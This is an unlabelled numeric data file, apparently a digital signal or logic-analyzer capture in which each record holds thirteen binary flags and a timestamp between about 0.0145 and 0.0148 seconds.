0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516428e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516456e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516480e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516604e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516628e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516656e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516680e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516804e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516828e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516856e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516880e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4517004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4517028e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4517056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4517080e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4517108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4517132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4517156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4517180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4517204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4517228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4517256e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4517280e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4517308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4517332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4517356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4517380e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4641884e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4642060e-02 1,1,1,1,1,0,0,0,0,0,0,1,0,1,1.4642084e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4642104e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4642652e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4643164e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4643192e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643196e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4643220e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643244e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4643252e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4643296e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4643316e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643324e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4643348e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643372e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4643380e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4643420e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4643444e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643448e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4643468e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643496e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.4643500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4643504e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4643516e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643548e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4643572e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643596e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4643604e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4643644e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4643668e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4643716e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4643748e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4643796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4643820e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643828e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4643844e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643868e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4643916e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.4643948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4643952e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4643968e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4643996e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4644044e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4644068e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644076e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4644092e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644116e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4644144e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644168e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4644196e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644220e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4644244e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644268e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4644272e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4644316e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4644344e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644348e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4644368e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644392e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4644396e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4644420e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4644444e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644452e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4644492e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644516e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4644568e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644596e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4644644e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644668e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.4644672e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4644676e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4644692e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4644716e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4644768e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4644796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644800e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4644820e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644844e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4644848e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4644868e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4644892e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644900e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4644944e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4644968e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645020e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645044e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645092e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645116e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645168e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4645196e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4645220e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4645244e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645252e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645268e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645292e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645316e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645340e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4645348e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4645396e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4645420e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645444e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645468e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645492e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645516e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645544e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645568e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645592e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645620e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645644e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645668e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4645672e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4645716e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4645744e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4645768e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4645792e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645800e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645844e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645916e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4645944e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4645996e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.4646020e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4646024e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4646044e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4646068e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646076e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646092e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646116e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646144e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646168e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646192e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646220e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646244e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646268e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646292e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646316e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4646324e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4646368e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4646396e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.4646400e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646404e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646420e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646444e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646468e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646492e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646516e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646540e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4646548e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4646596e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4646620e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646628e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646644e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646668e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646692e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646716e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646744e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646768e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646792e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646816e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646840e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646892e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646916e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646940e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4646964e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4646988e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647016e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647040e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647068e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647092e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647116e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647140e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647164e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647188e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647216e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647240e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647268e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647292e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647316e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647340e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647364e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647388e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647416e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647440e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647468e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647492e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647516e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647540e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647564e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647588e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647616e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647640e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647668e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647692e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647716e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647740e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647764e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647788e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647816e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647840e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647892e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647916e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647940e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4647964e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4647988e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648016e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648040e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648068e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648092e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648116e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648140e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648164e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648188e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648216e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648240e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648268e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648292e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648316e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648340e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648364e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648388e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648416e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648440e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648468e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648492e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648516e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648540e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648564e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648588e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648616e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648640e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648668e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648692e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648716e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648740e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648764e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648788e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648816e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648840e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648892e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648916e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648940e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4648964e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4648988e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649016e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649040e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649068e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649092e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649116e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649140e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649164e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649188e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649216e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649240e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649268e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649292e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649316e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649340e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649364e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649388e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649416e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649440e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649468e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649492e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649516e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649540e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649568e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649588e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649616e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649644e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649668e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649692e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649716e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649740e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649768e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649816e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649844e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649892e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649916e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649944e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4649968e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4649996e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4650020e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4650048e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4650072e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4650100e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4650124e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4773724e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4773916e-02 0,0,0,0,0,0,0,0,0,0,0,1,0,1,1.4773952e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4773972e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.4774260e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4774284e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.4774308e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4774336e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.4774340e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,1.4774360e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.4774388e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,1,1.4774392e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4774396e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.4774412e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4774436e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.4774440e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,1.4774460e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.4774484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4774492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.4774508e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4774536e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4774556e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4774560e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4774588e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4774612e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4774636e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4774640e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4774660e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4774684e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4774708e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4774736e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4774760e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4774788e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4774792e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4774812e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4774836e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4774840e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4774860e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4774884e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4774892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4774908e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4774936e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4774940e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4774960e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4774988e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4774992e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775012e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775036e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775060e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775084e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775108e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775136e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775160e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775188e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4775212e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775236e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775244e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775260e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775284e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775308e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775336e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775340e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4775360e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775388e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4775412e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775436e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4775460e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775508e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775536e-02 